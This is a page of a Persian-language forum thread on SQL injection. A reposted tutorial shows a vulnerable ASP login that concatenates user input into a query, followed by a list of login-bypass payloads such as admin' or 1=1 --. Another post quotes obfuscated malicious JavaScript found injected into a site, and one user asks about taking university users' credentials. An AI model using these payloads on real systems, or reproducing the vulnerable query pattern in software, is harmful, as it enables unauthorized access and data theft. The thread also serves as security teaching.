تبلیغات :
آکوستیک ، فوم شانه تخم مرغی، صداگیر ماینر ، یونولیت
دستگاه جوجه کشی حرفه ای
فروش آنلاین لباس کودک
خرید فالوور ایرانی
خرید فالوور اینستاگرام
خرید ممبر تلگرام

[ + افزودن آگهی متنی جدید ]




صفحه 2 از 3 اولاول 123 آخرآخر
نمايش نتايج 11 به 20 از 29

نام تاپيک: SQL Injection in SQL Server ( يكي از شيوه هاي هك )

  1. #11
    در آغاز فعالیت
    تاريخ عضويت
    Feb 2005
    محل سكونت
    تهران
    پست ها
    4

    پيش فرض

    خيلي عالي بود ممنون

  2. #12
    داره خودمونی میشه
    تاريخ عضويت
    Nov 2008
    پست ها
    64

    پيش فرض

    فوق العادست.همين طور ادامه بده هاتف جان

  3. #13
    در آغاز فعالیت
    تاريخ عضويت
    Mar 2009
    پست ها
    1

    پيش فرض sql injection

    سلام به همه
    می خواستم بدونم این sl injection مراتب داره یا نه ؟
    منظورم اینه مثلا من می خوام یوزر و پسورد یکی از هزاران کاربر یه دانشگاه رو به دست بیارم و با اون به منابع اطلاعاتی اش وصل شم . آیا این کار به سختی کارای خیلی پیشرفته تری است که با این روش می شه انجام داد ؟

  4. #14
    پروفشنال MicrosoftH's Avatar
    تاريخ عضويت
    Apr 2008
    محل سكونت
    Persia
    پست ها
    810

    6 The King's Of Hackers underground The World

    واقعا" دمت گرم ولی من میخوام یک گروه تشکیل بدم
    روش دیگه توی درایو فلش -موبایل-درایو مایی کامپیوتر و ... اگر یک پوشه به نام Autorun.inf
    تشکیل بدی ویروس اتوران دیگه وارد نمی شه
    نترس نقطه رو قبول میکنه بعضی میگن نقطه قبول نمیکنه ولی بزن نترس

  5. #15
    داره خودمونی میشه
    تاريخ عضويت
    Jul 2006
    پست ها
    142

    پيش فرض پيغام گوگل درباره مشكوك بودن يكي از سايت هاي شركت ما به ويروسي بودن

    سلام
    چند روز پيش وقتي اسم سايتم رو در گوگل سرچ كردم ، در كنار نام سايت نوشته شده بود " بازديد از اين سايت مكن است به رايانه شما آسيب وارد نمايد . " كه البته با كليك روي نام سايت صفحه ديگه بود كه توضيح مي داد اين سايت مشكوك به آلوده بودنه و ..
    اين سايت بغير از صفحه تماس با كه ارسال ايميل آن با استفاده از php هست ، بقيه قسمت هاش كاملا استاتيك هست ، وقتي من فايل هاي صفحات سايت رو دانلود كردم و بازشون كردم به انتهاي تمامي صفحات بعد از تگ </html> كدي چسبيده بود كه براتون اينجا مي ذارم :

    div id='x0dc1d5702fd59a862093c38747f60f9b9'><script type="text/javascript">var jQuery=window['eVvqaql4'.replace(/[q4VP\[]/g, '')]('e<vWa,lh'.replace(/[,\<W&h]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x 58\x30\x71\x33\x67\x28\x6f\x6f\x66\x66\x42\x29\x7b \x66\x75\x6e\.....

    از دوستان اگر كسي اطلاعاتي داره لطفا راهنمايي كنند كه اگر اين يك ويروسه چطور وارد شده و چطور مي شه امنيت سايت هاي استايك رو بالا برد ؟

  6. #16
    در آغاز فعالیت zxc_mehran's Avatar
    تاريخ عضويت
    Jun 2008
    پست ها
    12

    پيش فرض

    یه کد جاوا اسکریپته که باعث کرش کردن مرورگرت میشه... و شاید هم روی همه کار نکنه...مثلا فقط روی ie کرش کنه...

    البته خیلی مطمئن نیستم.

  7. #17
    آخر فروم باز
    تاريخ عضويت
    Apr 2008
    پست ها
    1,207

    پيش فرض

    مقاله ماملي نيست ! اما به زودي PDF هاي كاملي رو براتون قرار ميدم ! اينو بخونيد يه آمادگي ذهني داشته باشيد تا اصلي ها بياد !



    SQL یک زبان ساختار یافته ی متنی است که در سرويس دهنده ی وب مايکروسافت (IIS) استفاده ميشود و يکی از پر استفاده ترین نوع بانکهای اطلاعاتی است. در بانکهای اطلاعاتی، اطلاعاتی از قبیل User Name ها و Password ها، اطلاعات کاربران و ... نگهداری میشوند.

    واحد اجرايی در SQL ها Query ها هستند.

    Query چیست؟

    مجموعه ای از عبارات است که با آنها میتوان با بانک اطلاعاتی به تبادل اصلاعات پرداخت. و ما بايد با فرستادن آنها بر روی سرور از طريق به اهداف خود برسيم.



    کدهای زیر را یک طراح وب برای یک سیستم ورود بوسیله SQL و ASP نوشته است.


    Login.html



    <html>

    <body>

    <form method=get action="login_page.asp">

    <input type="text" name="login_name">

    <input type="text" name="pass">

    <input type="submit" value="sign in">

    </form>

    </body>

    </html>



    login_page.asp



    <@language="vbscript">

    <%

    dim conn,rs,log,pwd

    log=Request.form("login_name")

    pwd=Request.form("pass")



    set conn = Server.CreateObject("ADODB.Connection")

    conn.ConnectionString="provider=microsoft.jet.OLED B.4.0;data source=c:\folder\multiplex.mdb"

    conn.Open

    set rs = Server.CreateObject("ADODB.Recordset")

    rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn

    If rs.EOF

    response.write("Login failed")

    else

    response.write("Login successful")

    End if

    %>



    همانطور که مشاهده کرديد طراح وب دو صفحه را طراحی کرده است:

    1- صفحه login.html که username و password کاربر از آنجا گرفته میشود.

    2- صفحه ای که در آن username و password وارد شده با اطلاعات داخل Data Base مقایسه میشود و در صورت وجود داشتن username و password در Data Base مقایسه میشود و در صورت درست بودن آنها پیغام درست بودن آنها داده میشود و در غیر این صورت پیغام درست نبودن آنها داده میشود.

    اگر query ما به صورت زیر باشد، ما ميتوانيم از بخش ورود با موفقيت عبور کنيم.

    Username : admin

    Password : admin’ or a



    Username : admin

    Password : admin’ or a=a --



    حال چرا اين اتفاق می افتد؟

    در مثال بالا نفوذگر از یک روش ساده برای نفوذ استفاده کرده است. او کلمه کاربر را وارد و در محل ورود کلمه عبور عبارت Admin’ or a=a را وارد می کند. در اینجا بانک اطلاعاتی به بررسی آن خواهد پرداخت. شايد کلمه عبور admin نباشد اما نفوذگر از عبارت Or a=a نیز استفاده کرده است. این عبارت به این مفهوم است که کلمه عبور یا (admin) است و یا است.a که = a و بانک اطلاعاتی با مواجه شدن با این عبارت فرض ميکند کلمه عبور درست است و نفوذگر ميتواند به سیستم وارد شود.

    نمونه های ديگری از مثال بالا:

    admin" or "a"="a

    admin" or 1=1 --

    admin' or 1=1 --

    admin' or 'a'='a

    admin') or ('a'='a

    admin") or ("a"="a

    حال اگر هیچ کدام از این روشها کار نکرد چکار کنيم؟

    ما وقتی می توانیم به طور موفقیت آمیز به یک سیستم نفوذ کنیم که دقیقا از نحوه طراحی بانک اطلاعاتی آن مطلع باشيم.

    قسمت اصلی همين جاست. اگر خدا خواست در مقالات بعد به اين موضوع میپردازيم.

    by : b_ice
    من این روش رو تو پیسی ورلد خودمون با نام کاربری خودم و با فایر فاکس انجام دادم.جواب نداد

  8. #18
    در آغاز فعالیت miladgolpesar's Avatar
    تاريخ عضويت
    Sep 2009
    پست ها
    3

    پيش فرض

    آقا من دارم برنامه نویسی جاوا اسکریپ کار میکنم یعنی تازه شروع کردم خوب میشه حالا توی این حملات استفاده بشه
    البته باید عرض کنم زبان بسیار کاملی است چون به تک تک اجزای کامپوتر دسترسی داره
    راستی از کسانی که این زبان را بلدند اگر مایلند واسه پروژه کار کرد دستور بدون پایه سیستم درخواست همکاری میشه البته واسه ۲ هفته بعد از این تاریخ

  9. #19
    در آغاز فعالیت
    تاريخ عضويت
    Aug 2009
    پست ها
    4

    پيش فرض

    این روش دیگه قدیمی شده و ما برنامه نویسان از پارامتر استفاده می کنیم که در این روش
    این نوع هک معنی نداره

  10. #20
    داره خودمونی میشه majid76's Avatar
    تاريخ عضويت
    Dec 2008
    محل سكونت
    هرکجا هستم باشم آسمان مال من است!
    پست ها
    27

    12 sql

    باسلام
    لطفا هرچه زودتر بحث و ادامه بدید.

Thread Information

Users Browsing this Thread

هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)

User Tag List

قوانين ايجاد تاپيک در انجمن

  • شما نمی توانید تاپیک ایحاد کنید
  • شما نمی توانید پاسخی ارسال کنید
  • شما نمی توانید فایل پیوست کنید
  • شما نمی توانید پاسخ خود را ویرایش کنید
  •